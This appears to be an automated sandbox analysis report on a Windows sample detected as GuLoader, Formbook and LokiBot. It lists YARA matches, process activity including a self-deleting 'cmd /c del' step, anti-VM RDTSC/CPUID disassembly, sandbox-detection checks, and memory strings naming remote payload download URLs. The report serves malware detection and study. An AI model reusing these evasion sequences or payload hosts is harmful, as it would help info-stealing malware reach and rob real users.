Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.1287054375.000000000596F000.00000004.00000001.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/0@17/13
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_01
Source: C:\Users\user\Desktop\F63V4i8eZU.exe File created: C:\Users\user\AppData\Local\Temp\~DFC9489ADE652B7AA1.TMP Jump to behavior
Source: F63V4i8eZU.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\F63V4i8eZU.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\F63V4i8eZU.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: F63V4i8eZU.exe Virustotal: Detection: 10%
Source: unknown Process created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe'
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\F63V4i8eZU.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe' Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\F63V4i8eZU.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32 Jump to behavior
Source: F63V4i8eZU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: chkdsk.pdbGCTL source: F63V4i8eZU.exe, 00000012.00000002.475302278.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.448678814.0000000009B40000.00000002.00000001.sdmp
Source: Binary string: chkdsk.pdb source: F63V4i8eZU.exe, 00000012.00000002.475302278.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ISOL.pdb source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe
Source: Binary string: wntdll.pdbUGP source: F63V4i8eZU.exe, 00000012.00000002.480375309.000000001E390000.00000040.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1285968735.0000000005440000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: F63V4i8eZU.exe, chkdsk.exe
Source: Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.448678814.0000000009B40000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.316460586.00000000022A0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_00406408 push es; ret 0_2_0040640F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_00405D8C push es; ret 0_2_00405D8B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B1833 push edx; ret 0_2_021B1861
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B0218 push edx; ret 0_2_021B0241
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B4A13 push edx; ret 0_2_021B4A41
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B3213 push edx; ret 0_2_021B3241
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B1A13 push edx; ret 0_2_021B1A41
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B6214 push edx; ret 0_2_021B6241
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B5A03 push edx; ret 0_2_021B5A31
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B4205 push edx; ret 0_2_021B4231
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B2A05 push edx; ret 0_2_021B2A31
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B1205 push edx; ret 0_2_021B1231
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B4233 push edx; ret 0_2_021B4261
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B2A33 push edx; ret 0_2_021B2A61
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B1233 push edx; ret 0_2_021B1261
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B5A33 push edx; ret 0_2_021B5A61
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B5225 push edx; ret 0_2_021B5251
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B3A24 push edx; ret 0_2_021B3A51
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B2224 push edx; ret 0_2_021B2251
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B0A24 push edx; ret 0_2_021B0A51
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B6A24 push edx; ret 0_2_021B6A51
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B0A58 push edx; ret 0_2_021B0A81
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B5253 push edx; ret 0_2_021B5281
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B3A54 push edx; ret 0_2_021B3A81
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B2254 push edx; ret 0_2_021B2281
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B6A54 push edx; ret 0_2_021B6A81
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B0248 push edx; ret 0_2_021B0271
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B4A44 push edx; ret 0_2_021B4A71
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B3244 push edx; ret 0_2_021B3271
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B1A44 push edx; ret 0_2_021B1A71
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B6244 push edx; ret 0_2_021B6271

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5852 NtWriteVirtualMemory,LoadLibraryA, 0_2_022A5852
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A08DC NtWriteVirtualMemory,TerminateProcess, 0_2_022A08DC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A045E EnumWindows,NtWriteVirtualMemory, 0_2_022A045E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A8DB4 NtWriteVirtualMemory,CreateProcessInternalW, 0_2_022A8DB4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A423F NtWriteVirtualMemory, 0_2_022A423F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4263 NtWriteVirtualMemory, 0_2_022A4263
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4277 NtWriteVirtualMemory, 0_2_022A4277
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5A46 NtWriteVirtualMemory,LoadLibraryA, 0_2_022A5A46
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5A84 0_2_022A5A84
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2AFD 0_2_022A2AFD
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2AD6 0_2_022A2AD6
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A33A7 NtWriteVirtualMemory, 0_2_022A33A7
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A78B2 0_2_022A78B2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A28E2 NtWriteVirtualMemory,LoadLibraryA, 0_2_022A28E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4128 NtWriteVirtualMemory, 0_2_022A4128
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A3920 LoadLibraryA, 0_2_022A3920
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A513E NtWriteVirtualMemory, 0_2_022A513E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A46E4 NtWriteVirtualMemory, 0_2_022A46E4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7EFC LoadLibraryA, 0_2_022A7EFC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A1FD9 NtWriteVirtualMemory, 0_2_022A1FD9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2470 NtWriteVirtualMemory,LoadLibraryA, 0_2_022A2470
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A3C4D NtWriteVirtualMemory, 0_2_022A3C4D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7CA5 NtWriteVirtualMemory, 0_2_022A7CA5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7488 NtWriteVirtualMemory, 0_2_022A7488
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A0182 second address: 00000000022A0182 instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A6E61 second address: 00000000022A6E61 instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A01B2 second address: 00000000022A01B2 instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A78FC second address: 00000000022A790A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A83B5 second address: 00000000022A83B5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp byte ptr [ebx], al 0x0000000c mov eax, dword ptr [ebp+0000025Ch] 0x00000012 jne 00007EFE34D2B3ABh 0x00000014 mov dword ptr [ebp+0000022Eh], esi 0x0000001a mov esi, AFB1434Bh 0x0000001f test bl, bl 0x00000021 cmp cl, bl 0x00000023 add esi, 0257D909h 0x00000029 add esi, 650EE949h 0x0000002f xor esi, 1718259Dh 0x00000035 clc 0x00000036 cmp ecx, esi 0x00000038 mov esi, dword ptr [ebp+0000022Eh] 0x0000003e jne 00007EFE34D2B117h 0x00000044 cmp bx, FDCDh 0x00000049 inc ecx 0x0000004a inc ebx 0x0000004b cmp ah, bh 0x0000004d mov dword ptr [ebp+0000018Bh], ecx 0x00000053 mov ecx, dword ptr [ebx] 0x00000055 cmp ecx, 9090C350h 0x0000005b mov ecx, dword ptr [ebp+0000018Bh] 0x00000061 jne 00007EFE34D2B3A6h 0x00000063 mov dword ptr [ebp+00000243h], ecx 0x00000069 mov ecx, edx 0x0000006b cmp ecx, dword ptr [ebx] 0x0000006d mov ecx, dword ptr [ebp+00000243h] 0x00000073 jne 00007EFE34D2B37Ah 0x00000075 mov byte ptr [ebp+000001FBh], cl 0x0000007b test ebx, ebx 0x0000007d mov cl, byte ptr [ebx] 0x0000007f cmp cl, FFFFFFE8h 0x00000082 mov cl, byte ptr [ebp+000001FBh] 0x00000088 jne 00007EFE34D2B467h 0x0000008e mov dword ptr [ebp+0000025Ch], eax 0x00000094 mov eax, 4C6E8F3Eh 0x00000099 sub eax, 0007D298h 0x0000009e xor eax, B23D3242h 0x000000a3 add eax, 01A471D4h 0x000000a8 pushad 0x000000a9 rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000566C24 second address: 0000000000566C24 instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000565B7B second address: 0000000000565BB6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp edx, ebx 0x0000000c test eax, eax 0x0000000e je 00007EFE34D2B700h 0x00000014 pushad 0x00000015 mov dl, 95h 0x00000017 cmp dl, FFFFFF95h 0x0000001a jne 00007EFE34D2EAEFh 0x00000020 popad 0x00000021 mov dword ptr [ebp+000000E8h], eax 0x00000027 fnop 0x00000029 test bh, ch 0x0000002b mov eax, ebp 0x0000002d add eax, 00000100h 0x00000032 test ecx, edx 0x00000034 mov dword ptr [eax], 4FD2ADFDh 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000565BB6 second address: 0000000000565BED instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp edx, ebx 0x0000000c add dword ptr [eax], B8DD5D9Fh 0x00000012 pushad 0x00000013 mov dl, 11h 0x00000015 cmp dl, 00000011h 0x00000018 jne 00007EFE34BE0586h 0x0000001e popad 0x0000001f sub dword ptr [eax], 2B06605Eh 0x00000025 xor dword ptr [eax], DDA9ACEEh 0x0000002b fnop 0x0000002d test bh, ch 0x0000002f push 8402AFE5h 0x00000034 test ecx, edx 0x00000036 pushad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000565BED second address: 0000000000565BED instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000562BCB second address: 0000000000562BCB instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000563C85 second address: 0000000000563F54 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub edx, 22E6120Ah 0x00000010 xor edx, 256ED0EBh 0x00000016 cmp ax, 0000EAB4h 0x0000001a cmp dword ptr [esi+24h], edx 0x0000001d mov edx, dword ptr [ebp+00000273h] 0x00000023 je 00007EFE34BDD0C7h 0x00000029 mov ebx, 263052C4h 0x0000002e cmp dx, ax 0x00000031 xor ebx, B0E6794Fh 0x00000037 add ebx, 61B5A210h 0x0000003d pushad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000563F54 second address: 0000000000563F54 instructions:
Tries to detect Any.run
Source: C:\Users\user\Desktop\F63V4i8eZU.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\F63V4i8eZU.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\F63V4i8eZU.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\F63V4i8eZU.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: F63V4i8eZU.exe, 00000000.00000002.316897484.0000000002B80000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: F63V4i8eZU.exe, 00000000.00000002.316897484.0000000002B80000.00000004.00000001.sdmp, F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://KINMIRAI.ORG/WP-CONTENT/BIN_QVWER224.BINHTTP://FARMERSSCHOOL.GE/BIN_QVWER224.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A0182 second address: 00000000022A0182 instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A6E61 second address: 00000000022A6E61 instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A01B2 second address: 00000000022A01B2 instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A78FC second address: 00000000022A790A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A790A second address: 00000000022A79F6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov esi, DCAAA67Fh 0x00000010 test dl, dl 0x00000012 xor esi, F2CCAB26h 0x00000018 test edx, edx 0x0000001a sub esi, 536EBD65h 0x00000020 test bh, ch 0x00000022 xor esi, DAF7BFF4h 0x00000028 test ecx, ecx 0x0000002a test bx, cx 0x0000002d add esi, 00001000h 0x00000033 test bx, ax 0x00000036 cmp cl, dl 0x00000038 cmp bx, dx 0x0000003b mov dword ptr [ebp+000001F8h], FC14852Ch 0x00000045 test ebx, ecx 0x00000047 xor dword ptr [ebp+000001F8h], 83A94D75h 0x00000051 xor dword ptr [ebp+000001F8h], AA3F6E81h 0x0000005b cmp ah, 00000015h 0x0000005e sub dword ptr [ebp+000001F8h], D581B6D8h 0x00000068 cmp esi, dword ptr [ebp+000001F8h] 0x0000006e je 00007EFE34D2B83Ah 0x00000074 mov dword ptr [ebp+00000204h], 67BCF0E4h 0x0000007e xor dword ptr [ebp+00000204h], E457B680h 0x00000088 xor dword ptr [ebp+00000204h], E04C2F31h 0x00000092 xor dword ptr [ebp+00000204h], 1C589955h 0x0000009c cmp ch, dh 0x0000009e cmp esi, dword ptr [ebp+00000204h] 0x000000a4 je 00007EFE34D2B804h 0x000000aa test cl, dl 0x000000ac mov dword ptr [ebp+00000246h], eax 0x000000b2 mov eax, 03147A97h 0x000000b7 cmp ecx, ecx 0x000000b9 xor eax, 4F08C75Bh 0x000000be cmp cl, al 0x000000c0 sub eax, 1A91E3C1h 0x000000c5 sub eax, 318ADA0Bh 0x000000ca push eax 0x000000cb mov eax, dword ptr [ebp+00000246h] 0x000000d1 cmp bh, ah 0x000000d3 push 25819736h 0x000000d8 sub dword ptr [esp], 3CB652F7h 0x000000df xor dword ptr [esp], 3AF83707h 0x000000e6 pushad 0x000000e7 mov ebx, 000000DBh 0x000000ec rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A77CE second address: 00000000022A77CE instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 13311C4Bh 0x00000013 sub eax, 1A8CF406h 0x00000018 add eax, EA75BF22h 0x0000001d sub eax, E319E766h 0x00000022 cpuid 0x00000024 jmp 00007EFE34BDCE6Ah 0x00000026 cmp bh, dh 0x00000028 bt ecx, 1Fh 0x0000002c jc 00007EFE34BDD441h 0x00000032 test dh, dh 0x00000034 popad 0x00000035 cmp cx, bx 0x00000038 call 00007EFE34BDCF8Bh 0x0000003d lfence 0x00000040 rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A83B5 second address: 00000000022A83B5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp byte ptr [ebx], al 0x0000000c mov eax, dword ptr [ebp+0000025Ch] 0x00000012 jne 00007EFE34D2B3ABh 0x00000014 mov dword ptr [ebp+0000022Eh], esi 0x0000001a mov esi, AFB1434Bh 0x0000001f test bl, bl 0x00000021 cmp cl, bl 0x00000023 add esi, 0257D909h 0x00000029 add esi, 650EE949h 0x0000002f xor esi, 1718259Dh 0x00000035 clc 0x00000036 cmp ecx, esi 0x00000038 mov esi, dword ptr [ebp+0000022Eh] 0x0000003e jne 00007EFE34D2B117h 0x00000044 cmp bx, FDCDh 0x00000049 inc ecx 0x0000004a inc ebx 0x0000004b cmp ah, bh 0x0000004d mov dword ptr [ebp+0000018Bh], ecx 0x00000053 mov ecx, dword ptr [ebx] 0x00000055 cmp ecx, 9090C350h 0x0000005b mov ecx, dword ptr [ebp+0000018Bh] 0x00000061 jne 00007EFE34D2B3A6h 0x00000063 mov dword ptr [ebp+00000243h], ecx 0x00000069 mov ecx, edx 0x0000006b cmp ecx, dword ptr [ebx] 0x0000006d mov ecx, dword ptr [ebp+00000243h] 0x00000073 jne 00007EFE34D2B37Ah 0x00000075 mov byte ptr [ebp+000001FBh], cl 0x0000007b test ebx, ebx 0x0000007d mov cl, byte ptr [ebx] 0x0000007f cmp cl, FFFFFFE8h 0x00000082 mov cl, byte ptr [ebp+000001FBh] 0x00000088 jne 00007EFE34D2B467h 0x0000008e mov dword ptr [ebp+0000025Ch], eax 0x00000094 mov eax, 4C6E8F3Eh 0x00000099 sub eax, 0007D298h 0x0000009e xor eax, B23D3242h 0x000000a3 add eax, 01A471D4h 0x000000a8 pushad 0x000000a9 rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A47EF second address: 00000000022A480D instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 xor ebx, 17707658h 0x00000009 sub ebx, D3E79B27h 0x0000000f push ebx 0x00000010 test ecx, ecx 0x00000012 mov ebx, dword ptr [ebp+000001F3h] 0x00000018 pushad 0x00000019 mov ebx, 000000A4h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A480D second address: 00000000022A4843 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 nop 0x00000004 push A346122Fh 0x00000009 add dword ptr [esp], 1CC77B86h 0x00000010 xor dword ptr [esp], D8053D6Bh 0x00000017 cmp dx, bx 0x0000001a add dword ptr [esp], E7F74F24h 0x00000021 cmp al, cl 0x00000023 mov eax, ebp 0x00000025 add eax, 00000100h 0x0000002a mov dword ptr [eax], 05D9D0D6h 0x00000030 pushad 0x00000031 mov esi, 00000061h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 000000000056790A second address: 00000000005679F6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov esi, DCAAA67Fh 0x00000010 test dl, dl 0x00000012 xor esi, F2CCAB26h 0x00000018 test edx, edx 0x0000001a sub esi, 536EBD65h 0x00000020 test bh, ch 0x00000022 xor esi, DAF7BFF4h 0x00000028 test ecx, ecx 0x0000002a test bx, cx 0x0000002d add esi, 00001000h 0x00000033 test bx, ax 0x00000036 cmp cl, dl 0x00000038 cmp bx, dx 0x0000003b mov dword ptr [ebp+000001F8h], FC14852Ch 0x00000045 test ebx, ecx 0x00000047 xor dword ptr [ebp+000001F8h], 83A94D75h 0x00000051 xor dword ptr [ebp+000001F8h], AA3F6E81h 0x0000005b cmp ah, 00000015h 0x0000005e sub dword ptr [ebp+000001F8h], D581B6D8h 0x00000068 cmp esi, dword ptr [ebp+000001F8h] 0x0000006e je 00007EFE34BDD30Ah 0x00000074 mov dword ptr [ebp+00000204h], 67BCF0E4h 0x0000007e xor dword ptr [ebp+00000204h], E457B680h 0x00000088 xor dword ptr [ebp+00000204h], E04C2F31h 0x00000092 xor dword ptr [ebp+00000204h], 1C589955h 0x0000009c cmp ch, dh 0x0000009e cmp esi, dword ptr [ebp+00000204h] 0x000000a4 je 00007EFE34BDD2D4h 0x000000aa test cl, dl 0x000000ac mov dword ptr [ebp+00000246h], eax 0x000000b2 mov eax, 03147A97h 0x000000b7 cmp ecx, ecx 0x000000b9 xor eax, 4F08C75Bh 0x000000be cmp cl, al 0x000000c0 sub eax, 1A91E3C1h 0x000000c5 sub eax, 318ADA0Bh 0x000000ca push eax 0x000000cb mov eax, dword ptr [ebp+00000246h] 0x000000d1 cmp bh, ah 0x000000d3 push 25819736h 0x000000d8 sub dword ptr [esp], 3CB652F7h 0x000000df xor dword ptr [esp], 3AF83707h 0x000000e6 pushad 0x000000e7 mov ebx, 000000DBh 0x000000ec rdtsc
